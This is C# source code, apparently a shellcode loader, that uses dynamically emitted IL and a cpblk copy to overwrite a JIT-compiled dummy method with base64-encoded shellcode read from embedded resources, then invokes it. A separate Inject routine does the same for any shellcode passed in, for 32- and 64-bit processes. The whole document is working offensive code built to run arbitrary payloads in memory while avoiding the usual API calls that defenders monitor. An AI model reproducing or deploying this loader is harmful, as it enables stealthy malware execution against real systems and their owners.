public static void InstantiateSecurityAttributes() { var t = new SecurityTreatAsSafeAttribute(); var u = new SecuritySafeCriticalAttribute(); var v = new SecurityTransparentAttribute(); var w = new SecurityCriticalAttribute(); var x = new SuppressUnmanagedCodeSecurityAttribute(); var y = new UnverifiableCodeAttribute(); var z = new AllowPartiallyTrustedCallersAttribute(); }
public static void Main(string[] args) { Type SmasherType = null; SmasherType = Assembly.GetExecutingAssembly().GetType("MethodSmasher"); if (SmasherType == null) { AppDomain currDomain = AppDomain.CurrentDomain; AssemblyName assName = new AssemblyName("MethodSmasher"); AssemblyBuilder assBuilder = currDomain.DefineDynamicAssembly(assName, AssemblyBuilderAccess.Run); AllowPartiallyTrustedCallersAttribute att = new AllowPartiallyTrustedCallersAttribute(); ConstructorInfo attConstructor = att.GetType().GetConstructors()[0]; CustomAttributeBuilder attBuilder = new CustomAttributeBuilder(attConstructor, new object[] { }); assBuilder.SetCustomAttribute(attBuilder); ModuleBuilder modBuilder = assBuilder.DefineDynamicModule("MethodSmasher"); UnverifiableCodeAttribute codAtt = new UnverifiableCodeAttribute(); ConstructorInfo codAttConstructor = codAtt.GetType().GetConstructors()[0]; CustomAttributeBuilder modAttBuilder = new CustomAttributeBuilder(codAttConstructor, new object[] { }); modBuilder.SetCustomAttribute(modAttBuilder); TypeBuilder tBuilder = modBuilder.DefineType("MethodSmasher", TypeAttributes.Public); Type[] parameters = new Type[3] { typeof(IntPtr), typeof(IntPtr), typeof(Int32) }; MethodBuilder methBuilder = tBuilder.DefineMethod("OverwriteMethod", (MethodAttributes.Static | MethodAttributes.Public), null, parameters); ILGenerator generator = methBuilder.GetILGenerator(); generator.Emit(OpCodes.Ldarg_0); generator.Emit(OpCodes.Ldarg_1); generator.Emit(OpCodes.Ldarg_2); generator.Emit(OpCodes.Volatile); generator.Emit(OpCodes.Cpblk); generator.Emit(OpCodes.Ret); SmasherType = tBuilder.CreateType(); } MethodInfo OverwriteMethod = SmasherType.GetMethod("OverwriteMethod"); Type SmashMeType = null; SmashMeType = Assembly.GetExecutingAssembly().GetType("SmashMe"); if (SmashMeType == null) { AppDomain currDomain = AppDomain.CurrentDomain; AssemblyName assName = new AssemblyName("SmashMe"); AssemblyBuilder assBuilder = currDomain.DefineDynamicAssembly(assName, AssemblyBuilderAccess.Run); AllowPartiallyTrustedCallersAttribute att = new AllowPartiallyTrustedCallersAttribute(); ConstructorInfo attConstructor = att.GetType().GetConstructors()[0]; CustomAttributeBuilder attBuilder = new CustomAttributeBuilder(attConstructor, new object[] { }); assBuilder.SetCustomAttribute(attBuilder); ModuleBuilder modBuilder = assBuilder.DefineDynamicModule("SmashMe"); UnverifiableCodeAttribute codAtt = new UnverifiableCodeAttribute(); ConstructorInfo codAttConstructor = codAtt.GetType().GetConstructors()[0]; CustomAttributeBuilder modAttBuilder = new CustomAttributeBuilder(codAttConstructor, new object[] { }); modBuilder.SetCustomAttribute(modAttBuilder); TypeBuilder tBuilder = modBuilder.DefineType("SmashMe", TypeAttributes.Public); Type[] parameters = new Type[1] { typeof(Int32) }; MethodBuilder mBuilder = tBuilder.DefineMethod("OverwriteMe", (MethodAttributes.Public | MethodAttributes.Static), typeof(Int32), parameters); ILGenerator generator = mBuilder.GetILGenerator(); Int32 xorValue = 0x41424344; generator.DeclareLocal(typeof(Int32)); generator.Emit(OpCodes.Ldarg_0); for (int i = 0; i < 100; i++) { generator.Emit(OpCodes.Ldc_I4, xorValue); generator.Emit(OpCodes.Xor); generator.Emit(OpCodes.Stloc_0); generator.Emit(OpCodes.Ldloc_0); xorValue++; } generator.Emit(OpCodes.Ldc_I4, xorValue); generator.Emit(OpCodes.Xor); generator.Emit(OpCodes.Ret); SmashMeType = tBuilder.CreateType(); } MethodInfo TargetMethod = SmashMeType.GetMethod("OverwriteMe"); //Force target method to be JIT'd for (int i = 0; i < 20; i++) { TargetMethod.Invoke(null, new object[] { 0x11112222 }); } IntPtr scAddress = IntPtr.Zero; if (IntPtr.Size == 4) { //Your shellcode should be base64 encoded var currentAssembly = Assembly.GetExecutingAssembly(); var resourceStream = currentAssembly.GetManifestResourceStream(@"NoAPISCLoader.scx86.txt"); StreamReader sr = new StreamReader(resourceStream); string encSC = sr.ReadToEnd(); byte[] buf = Convert.FromBase64String(encSC); byte[] shellcodeStub = new byte[10] { 0x60, 0xE8, 0x04, 0x00, 0x00, 0x00, 0x61, 0x31, 0xC0, 0xC3 }; byte[] finalShellcode = new byte[buf.Length + shellcodeStub.Length]; Buffer.BlockCopy(shellcodeStub, 0, finalShellcode, 0, shellcodeStub.Length); Buffer.BlockCopy(buf, 0, finalShellcode, shellcodeStub.Length, buf.Length); scAddress = Marshal.AllocHGlobal(finalShellcode.Length); Marshal.Copy(finalShellcode, 0, scAddress, finalShellcode.Length); var TargetMethodAddress = GetMethodAddress(TargetMethod); object[] methargs = new object[3] { TargetMethodAddress, scAddress, finalShellcode.Length }; OverwriteMethod.Invoke(null, methargs); object[] methargs2 = new object[1] { 0x11112222 }; var retval = TargetMethod.Invoke(null, methargs2); if ((Int32)retval != 0) { System.Environment.Exit(0); } } else { //Your shellcode should be base64 encoded var currentAssembly = Assembly.GetExecutingAssembly(); var resourceStream = currentAssembly.GetManifestResourceStream(@"NoAPISCLoader.scx64.txt"); StreamReader sr = new StreamReader(resourceStream); string encSC = sr.ReadToEnd(); byte[] buf = Convert.FromBase64String(encSC); byte[] shellcodeStub = new byte[27] { 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0x55, 0xE8, 0x0D, 0x00, 0x00, 0x00, 0x5D, 0x41, 0x5F, 0x41, 0x5E, 0x41, 0x5D, 0x41, 0x5C, 0x48, 0x31, 0xC0, 0xC3 }; byte[] finalShellcode = new byte[buf.Length + shellcodeStub.Length]; Buffer.BlockCopy(shellcodeStub, 0, finalShellcode, 0, shellcodeStub.Length); Buffer.BlockCopy(buf, 0, finalShellcode, shellcodeStub.Length, buf.Length); scAddress = Marshal.AllocHGlobal(finalShellcode.Length); Marshal.Copy(finalShellcode, 0, scAddress, finalShellcode.Length); var TargetMethodAddress = GetMethodAddress(TargetMethod); object[] methargs = new object[3] { TargetMethodAddress, scAddress, finalShellcode.Length }; OverwriteMethod.Invoke(null, methargs); object[] methargs2 = new object[1] { 0x11112222 }; var retval = TargetMethod.Invoke(null, methargs2); if ((Int32)retval != 0) { System.Environment.Exit(0); } } }
public static void Inject(byte[] shellcode) { //begin memcopy en msil AppDomain appD = AppDomain.CurrentDomain; AssemblyName assName = new AssemblyName("MethodSmasher"); AssemblyBuilder assBuilder = appD.DefineDynamicAssembly(assName, AssemblyBuilderAccess.Run); AllowPartiallyTrustedCallersAttribute attr = new AllowPartiallyTrustedCallersAttribute(); ConstructorInfo csInfo = attr.GetType().GetConstructors()[0]; object[] obArray = new object[0]; CustomAttributeBuilder cAttrB = new CustomAttributeBuilder(csInfo, obArray); assBuilder.SetCustomAttribute(cAttrB); ModuleBuilder mBuilder = assBuilder.DefineDynamicModule("MethodSmasher"); UnverifiableCodeAttribute codAttr = new UnverifiableCodeAttribute(); csInfo = codAttr.GetType().GetConstructors()[0]; CustomAttributeBuilder modCAttrB = new CustomAttributeBuilder(csInfo, obArray); mBuilder.SetCustomAttribute(modCAttrB); TypeBuilder tBuilder = mBuilder.DefineType("MethodSmasher", TypeAttributes.Public); Type[] allParams = { typeof(IntPtr), typeof(IntPtr), typeof(Int32) }; MethodBuilder methodBuilder = tBuilder.DefineMethod("OverwriteMethod", MethodAttributes.Public | MethodAttributes.Static, null, allParams); ILGenerator generator = methodBuilder.GetILGenerator(); generator.Emit(OpCodes.Ldarg_0); generator.Emit(OpCodes.Ldarg_1); generator.Emit(OpCodes.Ldarg_2); generator.Emit(OpCodes.Volatile); generator.Emit(OpCodes.Cpblk); generator.Emit(OpCodes.Ret); var smasherType = tBuilder.CreateType(); var overWriteMethod = smasherType.GetMethod("OverwriteMethod"); //end memcopy en msil //begin xor dummy method appD = AppDomain.CurrentDomain; assName = new AssemblyName("SmashMe"); assBuilder = appD.DefineDynamicAssembly(assName, AssemblyBuilderAccess.Run); attr = new AllowPartiallyTrustedCallersAttribute(); csInfo = attr.GetType().GetConstructors()[0]; obArray = new object[0]; cAttrB = new CustomAttributeBuilder(csInfo, obArray); assBuilder.SetCustomAttribute(cAttrB); mBuilder = assBuilder.DefineDynamicModule("SmashMe"); codAttr = new UnverifiableCodeAttribute(); csInfo = codAttr.GetType().GetConstructors()[0]; modCAttrB = new CustomAttributeBuilder(csInfo, obArray); mBuilder.SetCustomAttribute(modCAttrB); tBuilder = mBuilder.DefineType("SmashMe", TypeAttributes.Public); Int32 xorK = 0x41424344; Type[] allParams2 = { typeof(Int32) }; methodBuilder = tBuilder.DefineMethod("OverwriteMe", MethodAttributes.Public | MethodAttributes.Static, typeof(Int32), allParams2); generator = methodBuilder.GetILGenerator(); generator.DeclareLocal(typeof(Int32)); generator.Emit(OpCodes.Ldarg_0); for (var x = 0; x < 101; x++) { generator.Emit(OpCodes.Ldc_I4, xorK); generator.Emit(OpCodes.Xor); generator.Emit(OpCodes.Stloc_0); generator.Emit(OpCodes.Ldloc_0); } generator.Emit(OpCodes.Ldc_I4, xorK); generator.Emit(OpCodes.Xor); generator.Emit(OpCodes.Ret); var smashmeType = tBuilder.CreateType(); var overwriteMeMethod = smashmeType.GetMethod("OverwriteMe"); //end xor dummy method //jit the xor method for (var x = 0; x < 21; x++) { try { var i = overwriteMeMethod.Invoke(null, new object[] { 0x11112222 }); Console.WriteLine(i); //debug } catch (Exception e) { if (e.InnerException != null) { string err = e.InnerException.Message; } } } byte[] trap; if (IntPtr.Size == 4) { //32bits shcode trap = new byte[] { 0x60, 0xe8, 0x04, 0, 0, 0, 0x61, 0x31, 0xc0, 0xc3 }; } else { //64bits shcode trap = new byte[] { 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0x55, 0xE8, 0x0D, 0x00, 0x00, 0x00, 0x5D, 0x41, 0x5F, 0x41, 0x5E, 0x41, 0x5D, 0x41, 0x5C, 0x48, 0x31, 0xC0, 0xC3 }; } byte[] finalShellcode = new byte[trap.Length + shellcode.Length]; Buffer.BlockCopy(trap, 0, finalShellcode, 0, trap.Length); Buffer.BlockCopy(shellcode, 0, finalShellcode, trap.Length, shellcode.Length); IntPtr shellcodeAddress = Marshal.AllocHGlobal(finalShellcode.Length); Marshal.Copy(finalShellcode, 0, shellcodeAddress, finalShellcode.Length); IntPtr targetMethodAddress = getMethodAddress(overwriteMeMethod); object[] owParams = new object[] { targetMethodAddress, shellcodeAddress, finalShellcode.Length }; try { overWriteMethod.Invoke(null, owParams); } catch (Exception e) { if (e.InnerException != null) { string err = e.InnerException.Message; } } overwriteMeMethod.Invoke(null, new object[] { 0x11112222 }); }